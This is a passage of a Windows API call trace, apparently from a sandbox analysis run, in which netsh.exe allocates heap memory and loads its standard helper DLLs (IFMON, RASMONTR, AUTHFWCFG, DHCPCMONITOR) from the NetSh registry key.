[0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d580 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d590 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d5a0 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d610 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d620 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d740 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d730 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d7c0 [0107.154] GetProcessHeap () returned 0xc50000 [0107.154] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d790 [0107.154] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d6d0 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d680 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d750 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d7d0 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d710 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d7e0 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d7f0 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d810 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d760 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d800 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d7b0 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d770 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d720 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d820 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d700 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d6c0 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d660 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d6e0 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d6f0 [0107.155] GetProcessHeap () returned 0xc50000 [0107.155] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d690 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d670 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d780 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d7a0 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d6a0 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5d6b0 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5dc18 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5db68 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5db78 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5daa8 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5dba8 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5dc28 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5da78 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5da68 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5dbe8 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5db58 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5db88 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5db98 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5db08 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5da98 [0107.156] GetProcessHeap () returned 0xc50000 [0107.156] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5db48 [0107.157] GetProcessHeap () returned 0xc50000 [0107.157] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5da88 [0107.157] GetProcessHeap () returned 0xc50000 [0107.157] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5dbb8 [0107.157] GetProcessHeap () returned 0xc50000 [0107.157] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5db28 [0107.157] GetProcessHeap () returned 0xc50000 [0107.157] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5db38 [0107.157] GetProcessHeap () returned 0xc50000 [0107.157] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5daf8 [0107.157] GetProcessHeap () returned 0xc50000 [0107.157] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x8) returned 0xc5dab8 [0107.157] _wcsicmp (_String1="netsh.exe", _String2="ipxmontr.dll") returned 5 [0107.157] _wcsicmp (_String1="netsh.exe", _String2="ipxpromn.dll") returned 5 [0107.157] GetProcessHeap () returned 0xc50000 [0107.157] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x14) returned 0xc5b128 [0107.157] GetProcessHeap () returned 0xc50000 [0107.157] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x2) returned 0xc5dbc8 [0107.157] GetProcessHeap () returned 0xc50000 [0107.157] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x14) returned 0xc54970 [0107.157] _wcsupr (in: _String="netsh.exe" | out: _String="NETSH.EXE") returned="NETSH.EXE" [0107.157] GetProcessHeap () returned 0xc50000 [0107.157] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0x0) returned 1 [0107.157] GetProcessHeap () returned 0xc50000 [0107.157] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x48) returned 0xc54db0 [0107.158] GetProcessHeap () returned 0xc50000 [0107.158] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0x0) returned 1 [0107.158] GetProcessHeap () returned 0xc50000 [0107.158] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x90) returned 0xc54bd8 [0107.158] GetProcessHeap () returned 0xc50000 [0107.158] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc54db0) returned 1 [0107.158] LoadLibraryExW (lpLibFileName="api-ms-win-appmodel-runtime-l1-1-0.dll", hFile=0x0, dwFlags=0x8) returned 0x773a0000 [0107.160] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\NetSh", ulOptions=0x0, samDesired=0x20019, phkResult=0x7f79fc | out: phkResult=0x7f79fc*=0x10c) returned 0x0 [0107.160] RegQueryInfoKeyW (in: hKey=0x10c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x7f79f8, lpcbMaxValueNameLen=0x7f79f0, lpcbMaxValueLen=0x7f79f4, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x0, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x7f79f8*=0x11, lpcbMaxValueNameLen=0x7f79f0, lpcbMaxValueLen=0x7f79f4, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0 [0107.160] GetProcessHeap () returned 0xc50000 [0107.161] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x16) returned 0xc53918 [0107.161] GetProcessHeap () returned 0xc50000 [0107.161] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x23) returned 0xc53938 [0107.161] RegEnumValueW (in: hKey=0x10c, dwIndex=0x0, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="2", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0107.161] _wcsicmp (_String1="ifmon.dll", _String2="ipxmontr.dll") returned -10 [0107.161] _wcsicmp (_String1="ifmon.dll", _String2="ipxpromn.dll") returned -10 [0107.161] GetProcessHeap () returned 0xc50000 [0107.161] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x28) returned 0xc52df8 [0107.161] GetProcessHeap () returned 0xc50000 [0107.161] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x4) returned 0xc5dac8 [0107.161] GetProcessHeap () returned 0xc50000 [0107.161] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x14) returned 0xc5df88 [0107.161] _wcsupr (in: _String="ifmon.dll" | out: _String="IFMON.DLL") returned="IFMON.DLL" [0107.161] GetProcessHeap () returned 0xc50000 [0107.161] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5b128) returned 1 [0107.161] LoadLibraryExW (lpLibFileName="IFMON.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e4b0000 [0107.396] GetProcAddress (hModule=0x6e4b0000, lpProcName="InitHelperDll") returned 0x6e4b1d30 [0107.396] InitHelperDll () returned 0x0 [0107.399] RegisterHelper () returned 0x0 [0107.399] GetProcessHeap () returned 0xc50000 [0107.399] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xd8) returned 0xc64a68 [0107.400] GetProcessHeap () returned 0xc50000 [0107.400] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc54bd8) returned 1 [0107.774] RegEnumValueW (in: hKey=0x10c, dwIndex=0x1, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="4", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0107.774] _wcsicmp (_String1="rasmontr.dll", _String2="ipxmontr.dll") returned 9 [0107.774] _wcsicmp (_String1="rasmontr.dll", _String2="ipxpromn.dll") returned 9 [0107.774] GetProcessHeap () returned 0xc50000 [0107.774] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x3c) returned 0xc53e88 [0107.774] GetProcessHeap () returned 0xc50000 [0107.774] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x4) returned 0xc5d978 [0107.774] GetProcessHeap () returned 0xc50000 [0107.774] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1a) returned 0xc62510 [0107.774] _wcsupr (in: _String="rasmontr.dll" | out: _String="RASMONTR.DLL") returned="RASMONTR.DLL" [0107.774] GetProcessHeap () returned 0xc50000 [0107.774] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc52df8) returned 1 [0107.774] LoadLibraryExW (lpLibFileName="RASMONTR.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e2b0000 [0109.528] LoadLibraryExA (lpLibFileName="MSVCRT.DLL", hFile=0x0, dwFlags=0x800) returned 0x77640000 [0109.529] GetVersion () returned 0x3ad7000a [0109.529] SetErrorMode (uMode=0x0) returned 0x0 [0109.529] SetErrorMode (uMode=0x8001) returned 0x0 [0109.529] LocalAlloc (uFlags=0x0, uBytes=0x2000) returned 0xc68bc8 [0109.529] LocalFree (hMem=0xc68bc8) returned 0x0 [0109.529] GetVersion () returned 0x3ad7000a [0109.547] GlobalLock (hMem=0xbb0004) returned 0xc68bc8 [0109.548] LocalAlloc (uFlags=0x40, uBytes=0x178) returned 0xc68cd8 [0109.548] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xc66208 [0109.548] LocalAlloc (uFlags=0x0, uBytes=0x8) returned 0xc5d988 [0109.548] malloc (_Size=0x80) returned 0xf71080 [0109.548] __dllonexit () returned 0x6e1ae510 [0109.548] __dllonexit () returned 0x6e1ae4e0 [0109.548] __dllonexit () returned 0x6e1ae4f0 [0109.549] __dllonexit () returned 0x6e1ae500 [0109.550] __dllonexit () returned 0x6e192bd0 [0109.551] __dllonexit () returned 0x6e192bc0 [0109.551] __dllonexit () returned 0x6e192c00 [0109.551] __dllonexit () returned 0x6e192c40 [0109.551] __dllonexit () returned 0x6e192d10 [0109.551] __dllonexit () returned 0x6e192d20 [0109.551] __dllonexit () returned 0x6e192d70 [0109.576] __dllonexit () returned 0x6e192e20 [0109.577] __dllonexit () returned 0x6e192c60 [0109.577] __dllonexit () returned 0x6e1ae560 [0109.577] __dllonexit () returned 0x6e192c80 [0109.577] __dllonexit () returned 0x6e192dd0 [0109.577] __dllonexit () returned 0x6e192df0 [0109.577] __dllonexit () returned 0x6e192e40 [0109.577] __dllonexit () returned 0x6e192e80 [0109.577] __dllonexit () returned 0x6e192e70 [0109.577] __dllonexit () returned 0x6e192ea0 [0109.577] __dllonexit () returned 0x6e192ec0 [0109.577] __dllonexit () returned 0x6e192ef0 [0109.577] __dllonexit () returned 0x6e192f70 [0109.578] __dllonexit () returned 0x6e192ae0 [0109.578] __dllonexit () returned 0x6e192af0 [0109.578] __dllonexit () returned 0x6e192ad0 [0109.579] RegisterClipboardFormatW (lpszFormat="commctrl_DragListMsg") returned 0xc1a5 [0109.580] __dllonexit () returned 0x6e1ae540 [0109.580] __dllonexit () returned 0x6e1ae520 [0109.580] __dllonexit () returned 0x6e1ae550 [0109.580] __dllonexit () returned 0x6e1ae530 [0109.580] GetVersion () returned 0x3ad7000a [0109.580] GetVersion () returned 0x3ad7000a [0109.580] GetVersion () returned 0x3ad7000a [0109.580] __dllonexit () returned 0x6e1a3c70 [0109.580] __dllonexit () returned 0x6e1a3c90 [0109.580] __dllonexit () returned 0x6e192ca0 [0109.580] __dllonexit () returned 0x6e192d30 [0109.581] __dllonexit () returned 0x6e192d40 [0109.581] __dllonexit () returned 0x6e1a3ae0 [0109.581] GetVersion () returned 0x3ad7000a [0109.581] GetProcessVersion (ProcessId=0x0) returned 0xa0000 [0109.581] GetSystemMetrics (nIndex=11) returned 32 [0109.581] GetSystemMetrics (nIndex=12) returned 32 [0109.581] GetSystemMetrics (nIndex=2) returned 17 [0109.581] GetSystemMetrics (nIndex=3) returned 17 [0109.581] GetDC (hWnd=0x0) returned 0x60100ce [0109.581] GetDeviceCaps (hdc=0x60100ce, index=88) returned 96 [0109.581] GetDeviceCaps (hdc=0x60100ce, index=90) returned 96 [0109.581] ReleaseDC (hWnd=0x0, hDC=0x60100ce) returned 1 [0109.581] GetSysColor (nIndex=15) returned 0xf0f0f0 [0109.581] GetSysColor (nIndex=16) returned 0xa0a0a0 [0109.581] GetSysColor (nIndex=20) returned 0xffffff [0109.582] GetSysColor (nIndex=18) returned 0x0 [0109.582] GetSysColor (nIndex=6) returned 0x646464 [0109.582] GetSysColorBrush (nIndex=15) returned 0x100072 [0109.582] GetSysColorBrush (nIndex=6) returned 0x10007a [0109.582] LoadCursorW (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007 [0109.582] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0109.582] __dllonexit () returned 0x6e192da0 [0109.582] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc196 [0109.582] __dllonexit () returned 0x6e1a3ad0 [0109.582] RegisterClipboardFormatW (lpszFormat="Native") returned 0xc004 [0109.582] RegisterClipboardFormatW (lpszFormat="OwnerLink") returned 0xc003 [0109.582] RegisterClipboardFormatW (lpszFormat="ObjectLink") returned 0xc002 [0109.582] RegisterClipboardFormatW (lpszFormat="Embedded Object") returned 0xc00a [0109.582] RegisterClipboardFormatW (lpszFormat="Embed Source") returned 0xc00b [0109.582] RegisterClipboardFormatW (lpszFormat="Link Source") returned 0xc00d [0109.582] RegisterClipboardFormatW (lpszFormat="Object Descriptor") returned 0xc00e [0109.582] RegisterClipboardFormatW (lpszFormat="Link Source Descriptor") returned 0xc00f [0109.582] RegisterClipboardFormatW (lpszFormat="FileName") returned 0xc006 [0109.582] RegisterClipboardFormatW (lpszFormat="FileNameW") returned 0xc007 [0109.582] RegisterClipboardFormatW (lpszFormat="Rich Text Format") returned 0xc07a [0109.583] RegisterClipboardFormatW (lpszFormat="RichEdit Text and Objects") returned 0xc083 [0109.583] RegisterClipboardFormatW (lpszFormat="commdlg_FindReplace") returned 0xc196 [0109.583] __dllonexit () returned 0x6e1ae570 [0109.583] __dllonexit () returned 0x6e1ae590 [0109.583] __dllonexit () returned 0x6e1ae5a0 [0109.583] __dllonexit () returned 0x6e1ae5b0 [0109.584] __dllonexit () returned 0x6e1ae5c0 [0109.584] GetCursorPos (in: lpPoint=0x6e27a298 | out: lpPoint=0x6e27a298*(x=1386, y=800)) returned 1 [0109.584] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0xc68e58 [0109.584] LocalReAlloc (hMem=0xc5d988, uBytes=0xc, uFlags=0x2) returned 0xc68320 [0109.584] GetCurrentThread () returned 0xfffffffe [0109.584] GetCurrentThreadId () returned 0x824 [0109.584] __dllonexit () returned 0x6e192f80 [0109.584] SetErrorMode (uMode=0x0) returned 0x8001 [0109.584] SetErrorMode (uMode=0x8001) returned 0x0 [0109.585] GetModuleFileNameW (in: hModule=0x6e170000, lpFilename=0x7f71f0, nSize=0x104 | out: lpFilename="C:\\WINDOWS\\System32\\MFC42u.dll" (normalized: "c:\\windows\\system32\\mfc42u.dll")) returned 0x1e [0109.585] wcscpy_s (in: _Destination=0x7f6fe8, _SizeInWords=0x104, _Source="MFC42u" | out: _Destination="MFC42u") returned 0x0 [0109.585] FindResourceW (hModule=0x6e170000, lpName=0xe01, lpType=0x6) returned 0xc30bb0 [0109.591] LoadStringW (in: hInstance=0x6e170000, uID=0xe000, lpBuffer=0x7f6de8, cchBufferMax=256 | out: lpBuffer="") returned 0x0 [0109.591] wcscpy_s (in: _Destination=0x7f7224, _SizeInWords=0x5, _Source=".HLP" | out: _Destination=".HLP") returned 0x0 [0109.591] wcscat_s (in: _Destination="MFC42u", _SizeInWords=0x104, _Source=".INI" | out: _Destination="MFC42u.INI") returned 0x0 [0109.605] malloc (_Size=0x40) returned 0xf73918 [0109.605] LocalAlloc (uFlags=0x40, uBytes=0x2090) returned 0xc68ee8 [0109.606] GetSystemDirectoryA (in: lpBuffer=0x7f743c, uSize=0x112 | out: lpBuffer="C:\\WINDOWS\\system32") returned 0x13 [0109.606] strcat_s (in: _Destination="C:\\WINDOWS\\system32", _SizeInBytes=0x112, _Source="\\MFC42" | out: _Destination="C:\\WINDOWS\\system32\\MFC42") returned 0x0 [0109.606] strcat_s (in: _Destination="C:\\WINDOWS\\system32\\MFC42", _SizeInBytes=0x112, _Source="LOC" | out: _Destination="C:\\WINDOWS\\system32\\MFC42LOC") returned 0x0 [0109.606] strcat_s (in: _Destination="C:\\WINDOWS\\system32\\MFC42LOC", _SizeInBytes=0x112, _Source=".DLL" | out: _Destination="C:\\WINDOWS\\system32\\MFC42LOC.DLL") returned 0x0 [0109.606] LoadLibraryExA (lpLibFileName="C:\\WINDOWS\\system32\\MFC42LOC.DLL", hFile=0x0, dwFlags=0x2) returned 0x0 [0109.611] GetProcAddress (hModule=0x6e2b0000, lpProcName="InitHelperDll") returned 0x6e2d4150 [0109.611] InitHelperDll () returned 0x0 [0109.611] RegisterHelper () returned 0x0 [0109.611] GetProcessHeap () returned 0xc50000 [0109.611] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x120) returned 0xc66910 [0109.611] GetProcessHeap () returned 0xc50000 [0109.611] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc64a68) returned 1 [0109.611] RegisterHelper () returned 0x0 [0109.611] GetProcessHeap () returned 0xc50000 [0109.611] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x168) returned 0xc65d40 [0109.611] GetProcessHeap () returned 0xc50000 [0109.611] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc66910) returned 1 [0109.613] RegisterHelper () returned 0x0 [0109.613] GetProcessHeap () returned 0xc50000 [0109.613] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1b0) returned 0xc66618 [0109.613] GetProcessHeap () returned 0xc50000 [0109.613] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc65d40) returned 1 [0109.613] RegisterHelper () returned 0x0 [0109.613] GetProcessHeap () returned 0xc50000 [0109.613] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1f8) returned 0xc6af80 [0109.613] GetProcessHeap () returned 0xc50000 [0109.613] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc66618) returned 1 [0109.613] RegisterHelper () returned 0x0 [0109.613] GetProcessHeap () returned 0xc50000 [0109.613] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x240) returned 0xc66618 [0109.613] GetProcessHeap () returned 0xc50000 [0109.613] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc6af80) returned 1 [0109.613] RegEnumValueW (in: hKey=0x10c, dwIndex=0x2, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="authfwcfg", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0109.613] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxmontr.dll") returned -8 [0109.613] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxpromn.dll") returned -8 [0109.613] GetProcessHeap () returned 0xc50000 [0109.613] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x50) returned 0xc66860 [0109.613] GetProcessHeap () returned 0xc50000 [0109.613] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x14) returned 0xc5dc88 [0109.613] GetProcessHeap () returned 0xc50000 [0109.613] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x1c) returned 0xc626c8 [0109.613] _wcsupr (in: _String="authfwcfg.dll" | out: _String="AUTHFWCFG.DLL") returned="AUTHFWCFG.DLL" [0109.613] GetProcessHeap () returned 0xc50000 [0109.613] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc53e88) returned 1 [0109.613] LoadLibraryExW (lpLibFileName="AUTHFWCFG.DLL", hFile=0x0, dwFlags=0x0) returned 0x6e110000 [0110.965] GetProcAddress (hModule=0x6e110000, lpProcName="InitHelperDll") returned 0x6e113d00 [0110.966] InitHelperDll () returned 0x0 [0110.970] RegisterHelper () returned 0x0 [0110.970] GetProcessHeap () returned 0xc50000 [0110.970] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x288) returned 0xc6db98 [0110.970] GetProcessHeap () returned 0xc50000 [0110.970] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc66618) returned 1 [0110.970] RegisterHelper () returned 0x0 [0110.970] GetProcessHeap () returned 0xc50000 [0110.970] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x2d0) returned 0xc6de28 [0110.970] GetProcessHeap () returned 0xc50000 [0110.970] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc6db98) returned 1 [0110.970] RegisterHelper () returned 0x0 [0110.970] GetProcessHeap () returned 0xc50000 [0110.970] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x318) returned 0xc6e100 [0110.970] GetProcessHeap () returned 0xc50000 [0110.970] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc6de28) returned 1 [0110.970] RegisterHelper () returned 0x0 [0110.970] GetProcessHeap () returned 0xc50000 [0110.970] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x360) returned 0xc6db98 [0110.971] GetProcessHeap () returned 0xc50000 [0110.971] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc6e100) returned 1 [0110.971] RegisterHelper () returned 0x0 [0110.971] GetProcessHeap () returned 0xc50000 [0110.971] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x3a8) returned 0xc6df00 [0110.971] GetProcessHeap () returned 0xc50000 [0110.971] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc6db98) returned 1 [0110.971] RegEnumValueW (in: hKey=0x10c, dwIndex=0x3, lpValueName=0xc53918, lpcchValueName=0x7f79e8, lpReserved=0x0, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec | out: lpValueName="dhcpclient", lpcchValueName=0x7f79e8, lpType=0x0, lpData=0xc53938, lpcbData=0x7f79ec) returned 0x0 [0110.971] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxmontr.dll") returned -5 [0110.971] _wcsicmp (_String1="dhcpcmonitor.dll", _String2="ipxpromn.dll") returned -5 [0110.971] GetProcessHeap () returned 0xc50000 [0110.971] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x64) returned 0xc66460 [0110.971] GetProcessHeap () returned 0xc50000 [0110.971] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x16) returned 0xc5e028 [0110.971] GetProcessHeap () returned 0xc50000 [0110.971] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x22) returned 0xc5fe00 [0110.971] _wcsupr (in: _String="dhcpcmonitor.dll" | out: _String="DHCPCMONITOR.DLL") returned="DHCPCMONITOR.DLL" [0110.971] GetProcessHeap () returned 0xc50000 [0110.971] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc66860) returned 1 [0110.971] LoadLibraryExW (lpLibFileName="DHCPCMONITOR.DLL", hFile=0x0, 